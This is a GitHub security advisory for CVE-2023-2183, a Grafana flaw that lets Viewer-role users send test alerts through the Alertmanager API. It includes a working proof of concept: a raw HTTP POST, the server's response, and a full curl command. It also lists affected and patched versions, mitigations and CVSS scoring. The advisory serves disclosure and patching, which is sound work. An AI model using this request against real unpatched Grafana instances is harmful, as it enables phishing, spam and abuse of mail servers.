Skip to content

Grafana has Broken Access Control in Alert manager: Viewer can send test alerts

Moderate severity GitHub Reviewed Published Jun 8, 2023 in grafana/bugbounty • Updated Jun 12, 2023

Package

gomod github.com/grafana/grafana (Go)

Affected versions

< 8.5.26
>= 9.0.0, < 9.2.19
>= 9.3.0, < 9.3.15
>= 9.4.0, < 9.4.12
>= 9.5.0, < 9.5.3

Patched versions

8.5.26
9.2.19
9.3.15
9.4.12
9.5.3

Description

Summary

Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role.

Reason for the error: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel.

This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.

Details

The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert.

View of the panel for the user in the Viewer role:
image

Admin role - View panel for admin role:
image

Admin role - Next step – editing:
image

Admin role - Additional options:
image

PoC

HTTP Request by user in role Viewer

POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1
Host: xxx
Cookie: grafana_session=xxx
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana
accept: application/json, text/plain, */*
content-type: application/json
…

{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"<[email protected]>",
"singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}],
"alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com",
"more":"http://example.com "},"labels":{}}}

HTTP Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Expires: -1
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 05 Apr 2023 10:43:00 GMT
Content-Length: 471

{"alert":{"annotations":{"__value_string__":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst",
"more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test",
"testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}},
"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}],
"notified_at":"2023-04-05T12:43:00.1430203+02:00"}

Result:

The attacker can send as a template alert or plain/text.

image

Impact

As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server.

From a practical point of view, this means that for each "GrafanaReceiver" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged.

CURL example – using a user session in the Viewer role:

curl -i -s -k -X $'POST' \
    -H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
    -b $'grafana_session=xxx' \
    --data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<[email protected]>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
    $'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'

Mitigation

  1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold.
  2. Check the API for the possibility of accessing this endpoint for other roles than admin

References

@KristianGrafana KristianGrafana published to grafana/bugbounty Jun 8, 2023
Published to the GitHub Advisory Database Jun 12, 2023
Reviewed Jun 12, 2023
Last updated Jun 12, 2023

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

EPSS score

0.094%
(41st percentile)

Weaknesses

CVE ID

CVE-2023-2183

GHSA ID

GHSA-cvm3-pp2j-chr3

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.